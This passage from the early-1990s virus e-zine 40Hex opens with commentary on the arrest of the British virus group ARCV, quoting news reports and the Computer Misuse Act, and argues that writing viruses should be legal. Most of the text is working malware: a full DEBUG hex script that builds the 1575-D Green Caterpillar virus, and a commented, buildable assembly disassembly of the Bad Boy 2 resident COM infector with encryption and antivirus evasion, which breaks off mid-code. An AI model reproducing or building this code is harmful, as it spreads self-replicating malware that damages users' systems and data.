computer equipment confiscated. Apparently, the bust was triggered not because
of the virus writing they did, but because of the method they allegedly used to
transport their creations to their friends in other countries. A contact in
England recently filled me in on the events which led to the bust of the ARCV.
Apparently, a few of the ARCV members were calling long distance by use of a
beige box (a device which allows tapping into phone lines to make unauthorized
calls) and they got caught. This led to the confiscation of their computer
equipment. The two who were arrested apparently cooperated with the police,
and further examination of the confiscated equipment proved that not only had
the police caught people making fraudulent phone calls, but they also caught
the leaders of a large virus writing group. Further investigation resulted in
more arrests of other ARCV members. Had the group not been phreaking their
calls, chances are they would not be in the fix they are today. Please note,
however, that there have not yet been any trials in the arrests, and the ARCV
members have not been proven guilty.
The following articles were posted on UseNet, and tell the story, although all
but one fail to mention the fact that illegal phone calls, and NOT virus
writing was the key factor in the arrests. Only after the first arrests were
made did the police pursue the avenue concerning virus authorship.
--------------
From "Computing", Feb 4, 1993:
Apache scalps virus cowboys
"Police raided the homes of suspected computer virus authors across
the country last week, arresting five people and seizing equipment.
"The raids were carried out last Wednesdau by police in Manchester,
Cumbria, Staffordshire and Devon and Cornwall.
"Scotland Yard's computer crimes unit co-ordinated the raids under the
codename Operation Apache.
" A spokeswoman for the Greater Manchester Police said: 'The
investigation began in the Mancheter area following the arrest of the
self-styled president of the virus writing group in Salford last
December.'
"Police would not reveal the man's name, but said he had been released
on bail.
"Last week's raids led to the the arrest of a further two people in
Manchester. Three other suspects were also arrested in Staffordshire,
Cumbria and Cornwall.
"PCs and floppy disks were seized in all the raids.
"All those arrested have been released on police bail pending further
investigations."
--------------
From the EFF.TALK newsgroup of Usenet:
"Police have arrested Britain's first computer virus-writing group
in an operation they hope will dampen the aspirations of any potential
high-tech criminals.
Four members of the Association of Really Cruel Viruses (ARCV) were
raided last Wednesday in a joint operation in four cities co-ordinated by
Scotland Yard's computer crimes unit.
The arrests in Greater Manchester, Cumbria, Staffordshire and
Devon and Cornwall, bring to six the members of the group that have been
tracked down by police. Two others, also writing for ARCV, were arrested
a month ago in Manchester.
This six are thought to have written between 30 and 50 relatively
harmless viruses....
--------------
From a reposting of an unidentified newspaper, dated 4 February 1993:
UK Virus Writers Group Foiled by Scotland Yard
British police have arrested four members of a virus-writing group that
calls itself the Association of Really Cruel Viruses (ARCV).
The Scotland Yard Computer Crime Unit coordinated the raids carried out
on suspects in Greater Manchester, Staffordshire, Devon, and Cornwall.
The arrests last Wednesday, January 27, bring to six the number of ARCV
members found by police, after they initially arrested one caught
"phreaking" in Manchester in December. ("Phone phreaking" is the illegal
practice of obtaining free use of telephone lines.) The arrests were
made under Section 3 of the Computer Misuse Act, which prohibits
unauthorized modification of computer material, said Detective Sergeant
Stephen Littler. The suspects, who cannot be identified at this stage
under British law, have been released on bail pending inquiries and may
face further charges.
The members of ARCV used PCs to write viruses, which they shared via a
bulletin board operated by one suspect in Cornwall. The police
confiscated hardware and software, which is being studied by virus
experts to determine how many viruses were written and what the viruses
were intended to do, Littler said. The British anti-virus community
became aware of ARCV through the group's own publicity efforts, such as
a newsletter that it had uploaded to various bulletin boards in the
U.S., according to Richard Ford, editor of the monthly "Virus Bulletin,"
which is published in Abingdon, Oxon, England. The newsletter was
described in detail in the November, 1992, issue of "Virus Bulletin."
"To the best of my knowledge, none of their viruses are in the wild, out
there spreading," said Ford. "But they have been found on virus
exchange bulletin board services, and we've had reports of them being
uploaded rather widely in the UK." ARCV claims, in its newsletter, to
have links with PHALCON/SKISM in the U.S. and other virus writers in
Eastern Europe. "The world is a very small place when you've got a
modem, or are on the Internet," Ford said. The newsletter invites new
members to join even if they are not virus writers but prefer other
"underground" activities such as hacking and phreaking. It also betrays
ARCV's fears of being perceived as nerds (a term not used in Britain)
saying, "Now the picture put out by the Anti- Virus Authors is that
Virus writers are Sad individuals who wear Anoraks and go Train Spotting
but well they are sadly mistaken, we are very intelligent, sound minded,
highly trained, and we wouldn't be seen in an Anorak or near an Anorak
even if dead." (Anorak is the British word for ski jacket.)
ARCV has already failed at one of the objectives mentioned in its
premier newsletter issue, which said, "We will be dodging Special Branch
and New Scotland Yard as we go."
--------------
The following is a summary of Britain's Computer Misuse Act 1990, which
deals with computer crimes:
Summary of Computer Misuse Act 1990:
{ heading }
...
1 -(1) A person is guilty of an offence if-
(A) he causes a computer to perform any function with intent to secure
access to any program or data held in any computer;
(b) the access he intends to secure is unauthorised; and
(c) he knows at the time when he causes the computer to perform the
function that that is the case.
(2) The intent a person has to have to commit an offence under this secton
need not be directed at -
(a) any particular program or data;
(b) a program or data of any particular kind; or
(c) a program or data held in any particular computer.
{ up to 6 months prison, or a medium scale - level 5 - fine, or both}
2 {similar - but access with intent to commit or facilitate further offnces}
3 -(1) A person is guilty of an offence if-
(a) he does any act which causes an unauthorised modification of the contents
of any computer; and
(b) at the time when he does the act he has the requisite intent and the
requisite knowledge.
(2) For the purposes of subsection (1)(b) above the requisite is an intent
to cause a modification of the contents of any computer and by so doing-
(a) to impair the operation of any computer;
(b) to prevent or hinder access to any program or data held in any comp
(c) to impair the operation of any such program or the reliability of
any such data.
(3) {similar clause on direction of intent to section 1}
(4) For the purposes of subsection (1)(b) above the requisite knowledge
is knowledge that any modification he intends to cause is unauthorised.
(5) It is immaterial for the purposes of this section whether an
unauthorised modification or any intended effect of it of a kind
mentioned in subsection (2) above is, or is intended to be, permanent
or merely temporary.
{ such damage not to be within the terms of the Criminal Damage Act 1971 unless
physical damage is caused }
{ In magistrates court - up to 6 months prison or maximum fine or both}
{ In Crown court up to 5 years prison and/or unlimited fine}
{ sections on Jurisdiction - Act applies as long as there is a significant
UK connection - either accused or target computer was in UK}
{ lots of further legal details - no way am I typing in all that!}
14. { search warrant to be issued by a judge, not just a magistrate}
15. { Extradition attempts possible for offences unders sections 2 or 3
conspiracy to commit such, or attempt to commit section 3 offence}
{ more verbiage}
17. {lots of definitions - Computer is _not_ formally defined anywhere
in English Law}
{Definition of Access - seems to cover anything you could think of
doing with a computer}
{defiitions of unauthorised - again rather wide}
{ ... }
(10) Refences to a program include refences to part of a program.
--------------
There ya have it. I personally would like to wish Apache Warrior, Ice-9,
and the rest of ARCV luck in the upcoming legal mess they face. I was sorry
to hear about the bust of the group, but even sorrier when I found out that
some of the members were arrested solely because they had a hand in virus
production. When you commit fraud, you are breaking the law, and yes, you
should be held accountable for your actions. I tend to have the opposite
point of view when it comes to authoring a virus, however. Simply writing code
should never be illegal. Spreading, yes, but writing? No. Unfortunately, the
"powers that be" don't always see it as I do.
--DecimatoR
40Hex Issue 10 Volume 3 Number 1 File 005
This is the 1575-D, or Green Caterpillar virus. This resident COM and EXE
infector is so named for the little green caterpillar which will occasionally
crawl across the screen and eat up characters as it goes along. It is
otherwise unremarkable.
-------------------------------------------------------------------------------
n 1575-d.com
e 0100 0E 8C C8 05 3F 00 50 B8 00 01 50 CB 00 00 00 00
e 0110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 01F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 02F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0320 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0330 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0340 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0350 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0360 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0370 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0380 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0390 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 03F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0410 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0430 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0440 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0450 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0460 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0470 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0480 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 0490 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
e 04E0 00 00 00 00 00 00 00 00 8B 07 2E FF 36 F8 07 2E
e 04F0 EB 4A 90 60 14 34 02 53 FF 00 F0 CD 20 00 00 00
e 0500 00 00 00 00 00 00 00 7E A4 0A 03 00 01 00 00 00
e 0510 01 0A 03 00 00 9C 0E 00 00 60 36 05 00 AA 43 B5
e 0520 9A 97 03 00 40 89 0E B4 0D 7A 04 71 EA 56 34 02
e 0530 00 00 00 00 78 F8 00 F0 5C 07 70 00 06 1E 8C C0
e 0540 0E 1F 0E 07 A3 35 01 8C D0 A3 2B 01 B0 02 E6 20
e 0550 FC 33 C0 8E D8 33 F6 BF 3C 01 B9 10 00 F2 A4 1E
e 0560 17 BD 08 00 87 EC E8 4C 00 E9 C6 03 E8 5D 04 E8
e 0570 AB 00 74 0E A0 24 07 50 E8 13 01 58 A2 24 07 EB
e 0580 13 90 E8 76 02 E8 95 02 80 3E 24 07 00 75 05 B8
e 0590 00 4C CD 21 80 3E 24 07 43 75 31 1F 07 0E 1F 07
e 05A0 06 BF 00 01 BE 0B 01 B9 0C 00 F2 A4 06 1F B8 00
e 05B0 01 50 33 C0 CB BE 06 00 AD 3D 92 01 74 DD 3D 79
e 05C0 01 75 03 E9 A9 00 3D DC 01 74 01 C3 1F 07 2E 8B
e 05D0 1E 19 01 2E 2B 1E 31 01 8C C8 2B C3 8E D0 2E 8B
e 05E0 2E 33 01 87 EC 2E 8B 1E 21 01 2E 2B 1E 23 01 8C
e 05F0 C8 2B C3 50 2E A1 25 01 50 CB 23 1A 3C 23 2F 2D
e 0600 2D 21 2E 24 0E 23 2F 2D E0 41 3A 31 35 37 35 2D
e 0610 44 2E 43 4F 4D 00 00 00 24 24 24 24 24 B8 02 3D
e 0620 BA 19 02 CD 21 73 02 F8 C3 A3 2B 01 BA 73 06 B8
e 0630 24 25 CD 21 B8 02 42 8B 1E 2B 01 B9 FF FF BA FE
e 0640 FF CD 21 BA 7D 02 B4 3F 8B 1E 2B 01 B9 02 00 CD
e 0650 21 B4 3E CD 21 1E 8B 16 39 01 A1 37 01 8E D8 B8
e 0660 24 25 CD 21 1F 81 3E 7D 02 0C 0A F8 C3 00 00 3D
e 0670 2D 02 74 1A 1E 07 0E 1F A1 2B 01 8E D0 87 EC BE
e 0680 3C 01 BF 00 00 B9 10 00 FC F2 A4 E9 DE FE B0 43
e 0690 A2 24 07 B0 08 E6 70 E4 71 A2 3B 01 BA 19 02 B8
e 06A0 02 3D CD 21 73 01 C3 A3 2B 01 BA 0B 01 8B 1E 2B
e 06B0 01 B9 0C 00 B4 3F CD 21 B8 02 42 33 C9 33 D2 CD
e 06C0 21 50 05 10 00 25 F0 FF 50 D1 E8 D1 E8 D1 E8 D1
e 06D0 E8 BF 1F 03 AB 58 5B 2B C3 B9 27 06 03 C8 BA 00
e 06E0 01 2B D0 8B 1E 2B 01 B4 40 CD 21 B8 00 42 33 C9
e 06F0 33 D2 CD 21 B4 40 8B 1E 2B 01 B9 0C 00 BA 1B 03
e 0700 CD 21 B4 3E 8B 1E 2B 01 CD 21 C3 0E 8C C8 05 3F
e 0710 00 50 B8 00 01 50 CB B0 45 A2 24 07 B0 08 E6 70
e 0720 E4 71 A2 3B 01 BA 19 02 B8 02 3D CD 21 73 01 C3
e 0730 A3 2B 01 BA 0B 01 8B 1E 2B 01 B9 18 00 B4 3F CD
e 0740 21 B8 02 42 B9 00 00 BA 00 00 CD 21 50 05 10 00
e 0750 83 D2 00 25 F0 FF 89 16 27 01 A3 29 01 B9 27 07
e 0760 81 E9 00 01 03 C1 83 D2 00 B9 00 02 F7 F1 40 A3
e 0770 0F 01 89 16 0D 01 A1 21 01 A3 23 01 A1 1F 01 A3
e 0780 25 01 A1 19 01 A3 31 01 A1 1B 01 A3 33 01 8B 16
e 0790 27 01 A1 29 01 B9 10 00 F7 F1 2D 10 00 2B 06 13
e 07A0 01 A3 21 01 A3 19 01 C7 06 1F 01 00 01 C7 06 1B
e 07B0 01 00 01 B8 00 42 33 C9 BA 02 00 CD 21 BA 0D 01
e 07C0 8B 1E 2B 01 B9 16 00 B4 40 CD 21 B8 02 42 33 C9
e 07D0 33 D2 CD 21 BA 00 01 A1 29 01 59 2B C1 2B D0 B9
e 07E0 27 07 03 C8 81 E9 00 01 B4 40 CD 21 B4 3E CD 21
e 07F0 C3 51 B9 00 00 B4 4E CD 21 59 C3 06 B8 1C 35 CD
e 0800 21 2E 89 1E 07 01 2E 8C 06 09 01 B8 21 35 CD 21
e 0810 06 58 2E A3 05 01 2E 89 1E 03 01 07 C3 50 06 1E
e 0820 33 C0 8E C0 BE 86 00 26 8B 04 8E D8 BE 25 07 81
e 0830 3C 0C 0A 75 09 1E 58 E8 B7 01 1F 07 58 C3 0E 1F
e 0840 A1 35 01 48 8E C0 26 80 3E 00 00 5A 74 03 EB 44
e 0850 90 26 A1 03 00 B9 37 07 D1 E9 D1 E9 D1 E9 D1 E9
e 0860 2B C1 72 30 26 A3 03 00 26 29 0E 12 00 0E 1F 26
e 0870 A1 12 00 50 07 BE 00 01 56 5F B9 27 06 FC F2 A4
e 0880 06 2B C0 8E C0 BE 84 00 BA A8 04 26 89 14 46 46
e 0890 58 26 89 04 1F 07 58 C3 3C 57 75 03 EB 1E 90 80
e 08A0 FC 1A 75 06 E8 17 01 EB 13 90 80 FC 11 75 04 E8
e 08B0 0F 00 CF 80 FC 12 75 04 E8 C1 00 CF 2E FF 2E 03
e 08C0 01 B0 57 CD 21 50 51 52 53 55 56 57 1E 06 0E 1F
e 08D0 0E 07 2E C6 06 CD 05 00 90 E8 18 00 75 0C E8 3C
e 08E0 FD 74 07 E8 54 01 FE 0E CD 05 07 1F 5F 5E 5D 5B
e 08F0 5A 59 58 C3 0E 07 0E 07 FC E8 36 00 73 04 83 FF
e 0900 00 C3 BF 19 02 B0 2E B9 0B 00 F2 AE 81 3D 43 4F
e 0910 75 0D 80 7D 02 4D 75 07 C6 06 24 07 43 90 C3 81
e 0920 3D 45 58 75 0C 80 7D 02 45 75 06 C6 06 24 07 45
e 0930 90 C3 1E 2E 8B 36 2D 01 2E A1 2F 01 8E D8 BF 19
e 0940 02 AC 3C FF 75 07 83 C6 06 AC EB 08 90 3C 05 72
e 0950 03 1F F9 C3 B9 0B 00 3C 00 74 06 04 40 AA B0 3A
e 0960 AA AC 3C 20 74 04 AA EB 0B 90 26 80 7D FF 2E 74
e 0970 03 B0 2E AA E2 EB B0 00 AA 1F F8 C3 B0 57 CD 21
e 0980 50 51 52 53 55 56 57 1E 06 0E 1F 0E 07 2E 80 3E
e 0990 CD 05 00 74 03 EB 1C 90 E8 59 FF 75 16 E8 7D FC
e 09A0 74 11 E8 95 00 FE 0E CD 05 07 1F 5F 5E 5D 5B 5A
e 09B0 59 58 C3 07 1F 5F 5E 5D 5B 5A 59 58 C3 00 50 1E
e 09C0 58 2E A3 2F 01 2E 89 16 2D 01 58 C3 0E B0 00 E6
e 09D0 20 B8 24 35 CD 21 89 1E 39 01 8C C3 89 1E 37 01
e 09E0 07 BE 0A 02 BF 19 02 B9 0F 00 AC 04 20 AA E2 FA
e 09F0 C3 50 0E 1F 0E 07 8A 1E 3B 01 80 FB 0C 77 39 80
e 0A00 FB 00 74 34 B0 08 E6 70 E4 71 3C 0C 77 2A 3C 00
e 0A10 74 26 3A C3 74 22 FE C3 E8 14 00 3A C3 74 19 FE
e 0A20 C3 E8 0B 00 3A C3 74 10 1F E8 3A 00 0E 1F C3 80
e 0A30 FB 0C 76 03 80 EB 0C C3 58 C3 BA 73 06 B8 24 25
e 0A40 CD 21 80 3E 24 07 43 75 06 E8 42 FC EB 04 90 E8
e 0A50 C5 FC 1E 8B 16 39 01 A1 37 01 8E D8 B8 24 25 CD
e 0A60 21 1F C3 B0 03 CF BA B0 06 B8 1C 25 CD 21 C6 06
e 0A70 B0 06 90 90 B8 00 B8 8E C0 BF A0 0F B8 20 07 B9
e 0A80 0B 00 F2 AB 0E 07 C3 00 00 00 20 07 0F 0A 0F 0A
e 0A90 0F 0A 0F 0A 0F 0A 0F 0A 0F 0A 0F 0A F7 0E EE 0C
e 0AA0 90 FB 50 51 52 53 55 56 57 1E 06 0E 1F EB 0B 90
e 0AB0 07 1F 5F 5E 5D 5B 5A 59 58 CF B8 00 B8 8E C0 E8
e 0AC0 2B 00 BE 9A 06 B9 16 00 F2 A4 80 3E AE 06 EE 74
e 0AD0 08 C6 06 AE 06 EE EB 06 90 C6 06 AE 06 F0 26 8B
e 0AE0 05 B4 0E A3 9A 06 C6 06 99 06 00 EB C3 BF 00 00
e 0AF0 BE 9C 06 57 B9 12 00 FC F3 A6 5F 74 0B 47 47 81
e 0B00 FF A0 0F 75 EB BF 00 00 81 FF 9E 0F 75 05 C6 06
e 0B10 B0 06 CF C3 43 0C 0A
rcx
0A17
w
q
-------------------------------------------------------------------------------
DA
40Hex Issue 10 Volume 3 Number 1 File 006
The following is the Bad Boy 2 virus. Patricia M. Hoffman's VSUM is clearly
not a good source of virus description, so we will not bother including its
utterly useless description of the virus here. Bad Boy 2 is a resident COM
infector. After 10 infections, it turns itself off. Although most of the
code is written well, there are still a few bugs and inconsistencies in it.
It implements several well-known stealth techniques, including playing with
the system file table. It is a segmented virus, with variable placement of
each segment when it infects a file. Thus the locations of each segment in
the virus relative to each other changes upon each infection.
For a byte-to-byte match up of the original, assemble with the following:
tasm badboy2.asm
tlink /t badboy2.asm
Note only one pass is required.
Dark Angel
Phalcon/Skism 1993
-------------------------------------------------------------------------------
.model tiny
.code
org 100h
; Bad Boy 2 virus
; Disassembly done by Dark Angel of Phalcon/Skism
; For 40Hex Issue 10 Volume 3 Number 1
start:
push cs:startviruspointer ; save on stack for
push cs ; return
pop ds
jmp word ptr cs:encryptpointer ; decrypt virus
endstart:
curpointer dw 0
infcounter db 0
filesize dw 2
filetime dw 0
filedate dw 0
origint21 dw 0, 0
DOSdiskOFF dw 0
DOSdiskSEG dw 0
oldint21 dw 0, 0
oldint24 dw 0, 0
; The parts of the virus are here
encryptpointer dw offset carrierencrypt
startviruspointer dw offset startvirus
installpointer dw offset install
exitviruspointer dw offset exitvirus
restoreint21pointer dw offset restoreint21
int24pointer dw offset int24
int21pointer dw offset int21
infectpointer dw offset infect
encryptlength dw endencrypt-encrypt
startviruslength dw endstartvirus-startvirus
installlength dw endinstall-install
exitviruslength dw endexitvirus-exitvirus
restoreint21length dw endrestoreint21-restoreint21
int24length dw endint24-int24
int21length dw endint21-int21
infectlength dw endinfect-infect
enddata:
encrypt: ; and decrypt
mov bx,offset startviruspointer
mov cx,6
do_next_segment:
cmp bx,offset int24pointer
jne not_int24pointer
add bx,2
not_int24pointer:
push bx
push cx
mov ax,[bx] ; get start offset
mov cx,[bx+encryptlength-encryptpointer] ; and length
mov bx,ax
encrypt_segment:
xor [bx],al ; encrypt cx bytes
inc bx
loop encrypt_segment
pop cx
pop bx
add bx,2 ; go to next segment
loop do_next_segment
retn
endencrypt:
startvirus:
mov es,cs:[2] ; get top of memory
mov di,100h ; check if virus
mov si,100h ; already resident
mov cx,offset endstart - offset start - 1
rep cmpsb
jnz not_installed ; continue if not
jmp cs:exitviruspointer ; otherwise, quit
not_installed:
mov ax,cs ; get current program's
dec ax ; MCB
mov ds,ax
cmp byte ptr ds:[0],'Z' ; check if last one
;nop
je is_last_MCB ; continue if so
jmp cs:exitviruspointer ; otherwise, quit
is_last_MCB:
rsize = ((endvirus - start + 15)/16+1)*3 ; resident size in
; paragraphs
sub word ptr ds:[3],rsize ; decrease MCB's memory
mov ax,es ; get segment of high memory
sub ax,rsize ; decrease by virus size
mov es,ax ; es = start segment of virus
mov ds:[12h],ax ; put value in PSP top of
; memory field
push cs
pop ds
mov cs:infcounter,0 ; clear infection counter
mov di,100h
mov cx,offset enddata - offset start
mov si,100h
rep movsb
mov bx,cs:encryptpointer
add bx,encrypt_segment-encrypt+1
xor byte ptr [bx],18h ; change to: xor [bx],bl
; shuffling segments to different locations
mov cx,8
mov curpointer,offset encrypt
shuffle:
push cx
call random_segment
push bx
mov ax,[bx]
push ax
add bx,encryptlength-encryptpointer
mov cx,[bx]
pop si
pop bx
xchg di,curpointer
mov es:[bx],di ; copy segment
rep movsb ; to memory area
xchg di,curpointer
mov ax,8000h
or [bx],ax ; mark already copied
pop cx
loop shuffle
mov cl,8
not ax ; ax = 7FFFh
mov bx,offset encryptpointer
clear_hibit: ; restore the pointers
and [bx],ax
add bx,2
loop clear_hibit
jmp cs:installpointer
random_segment:
push cx
push es
xor cx,cx
mov es,cx
random_segment_loop:
mov bx,es:[46Ch] ; get timer ticks since
; midnight MOD 8
db 081h,0e3h,7,0 ; and bx,7
shl bx,1 ; multiply by 2
add bx,offset encryptpointer
test word ptr [bx],8000h ; check if already moved
jnz random_segment_loop ; do it again if so
pop es
pop cx
retn
endstartvirus:
install:
xor ax,ax
mov ds,ax ; ds->interrupt table
mov ax,ds:21h*4 ; save old int 21h handler
mov es:oldint21,ax
mov ax,ds:21h*4+2
mov word ptr es:oldint21+2,ax
mov ah,30h ; get DOS version
int 21h
cmp ax,1E03h ; 3.X?
jne not_DOS_3X ; skip if not
mov es:origint21,1460h ; use known value for int 21h
mov ax,1203h ; get DOS segment
push ds
int 2Fh
mov word ptr es:origint21+2,ds
pop ds
jmp short is_DOS_3X
nop
not_DOS_3X:
mov ax,ds:21h*4
mov es:origint21,ax
mov ax,ds:21h*4+2
mov word ptr es:origint21+2,ax
is_DOS_3X:
cli ; set new int 21h handler
mov ax,es:int21pointer
mov ds:21h*4,ax
mov ax,es
mov ds:21h*4+2,ax
sti
mov cx,es
mov ah,13h ; get old DOS disk handler
int 2Fh ; to es:bx
push es
mov es,cx
mov es:DOSdiskOFF,dx
mov es:DOSdiskSEG,ds
pop es
int 2Fh ; restore DOS disk handler
jmp cs:exitviruspointer
endinstall:
exitvirus:
push cs ; copy return routine to
push cs ; buffer at end of file
pop ds ; and transfer control
pop es ; to it
mov si,cs:exitviruspointer
add si,offset return_to_COM - offset exitvirus
;nop
mov di,cs:filesize
add di,offset endvirus
push di
mov cx,offset end_return_to_COM - offset return_to_COM
cld
rep movsb
retn ; jmp to return_to_COM
return_to_COM:
mov si,cs:filesize
add si,100h
cmp si,offset endvirus ; check if small file
jae not_negative ; if not, skip next
mov si,offset endvirus ; adjust for too small
not_negative:
mov di,100h
mov cx,offset endvirus - offset start - 1 ; ????
rep movsb ; copy old file to start
mov ax,100h ; and exit the virus
push ax
retn
end_return_to_COM:
endexitvirus:
restoreint21:
xor di,di
mov ds,di
cli
mov di,cs:oldint21
mov ds:21h*4,di
mov di,word ptr cs:oldint21+2
mov ds:21h*4+2,di
sti
retn
plea db 'Make me better!'
endrestoreint21:
int24:
mov al,3
iret
message db 'The Bad Boy virus, Version 2.0, Copyright (C) 1991.',0
endint24:
int21:
push bx
push si
push di
push es
push ax
cmp ax,4B00h ; check if execute
jz execute ; continue if so
jmp short exitint21
nop
execute:
push ds
push cs
pop es
xor ax,ax
mov ds,ax
mov si,24h*4 ; get old int 24h
mov di,offset oldint24 ; handler
movsw
movsw
mov ax,cs:int24pointer
cli ; set new critical error
mov ds:24h*4,ax ; handler
mov ax,cs
mov ds:24h*4+2,ax
sti
pop ds
mov ax,3D00h ; open file read only
pushf
call dword ptr cs:oldint21
jc restore_exitint21
mov bx,ax ; handle to bx
call cs:infectpointer
pushf
mov ah,3eh ; close file
pushf
call dword ptr cs:oldint21
popf
jc restore_exitint21
push ds
cli ; subvert nasty disk
xor ax,ax ; monitoring programs
mov ds,ax
mov ax,cs:DOSdiskOFF
xchg ax,ds:13h*4
mov cs:DOSdiskOFF,ax
mov ax,cs:DOSdiskSEG
xchg ax,ds:13h*4+2
mov cs:DOSdiskSEG,ax
sti
pop ds
restore_exitint21:
push ds
xor ax,ax
mov ds,ax
mov ax,cs:oldint24
mov ds:24h*4,ax
mov ax,word ptr cs:oldint24+2
mov ds:24h*4+2,ax
pop ds
exitint21:
pop ax
pop es
pop di
pop si
pop bx
jmp dword ptr cs:oldint21
endint21:
infect:
push cx
push dx
push ds
push es
push di
push bp
push bx
mov ax,1220h ; get JFT entry for file
int 2Fh ; handle bx
mov bl,es:[di]
xor bh,bh
mov ax,1216h ; get associated SFT
int 2Fh ; entry to es:di
pop bx
mov ax,es:[di+11h] ; get file size
cmp ax,0F000h ; exit if too large
jb not_too_large
jmp errorinfect
not_too_large:
mov word ptr es:[di+2],2 ; set to read/write mode
mov ax,es:[di+11h] ; get file size (again)
mov cs:filesize,ax ; save it
mov ax,es:[di+0Dh] ; get file time
mov cs:filetime,ax ; save it
mov ax,es:[di+0Fh] ; get file date
mov cs:filedate,ax ; save it
push cs
pop ds
mov dx,4E9h
mov cx,3E8h
mov ah,3Fh ; Read from file
pushf
call dword ptr cs:oldint21
jnc read_ok
jmp errorinfect
read_ok:
mov bp,ax
mov si,dx
mov ax,'MZ' ; check if EXE
cmp ax,[si]
jne not_MZ
jmp errorinfect
not_MZ:
xchg ah,al
cmp ax,[si] ; check if EXE
jne not_ZM
jmp errorinfect
not_ZM:
push es
push di
push cs
pop es
mov si,100h ; check if already
mov di,dx ; infected
mov cx,offset endstart - offset start - 1
repe cmpsb
pop di
pop es
jnz not_already_infected
jmp errorinfect
not_already_infected:
mov word ptr es:[di+15h],0
push es
push di
mov si,cs:infectpointer
add si,offset write_virus - offset infect
xor di,di
push cs
pop es
mov cx,offset end_write_virus-offset write_virus
cld
rep movsb
pop di
pop es
mov si,cs:infectpointer
add si,offset finish_infect - offset infect
push si
xor si,si
push si
push ds
cli ; subvert nasty
xor ax,ax ; antivirus programs
mov ds,ax
mov ax,cs:DOSdiskOFF
xchg ax,ds:13h*4
mov cs:DOSdiskOFF,ax
mov ax,cs:DOSdiskSEG
xchg ax,ds:13h*4+2
mov cs:DOSdiskSEG,ax
sti
pop ds
retn
write_virus:
push bx
call cs:encryptpointer ; encrypt virus
pop bx
mov dx,100h
mov ah,40h ; write virus
mov cx,offset endvirus - offset start
pushf
call dword ptr cs:origint21
pushf
push bx
call cs:encryptpointer ; decrypt virus
pop bx
popf
jnc write_OK
pop ax
mov ax,cs:infectpointer
add ax,offset infectOK - offset infect
push ax
retn
write_OK:
mov ax,es:[di+11h] ; move file pointer
mov es:[di+15h],ax ; to end of file
mov dx,offset endvirus
mov cx,bp
mov ah,40h ; concatenate carrier
pushf ; file's first few bytes
call dword ptr cs:origint21
retn
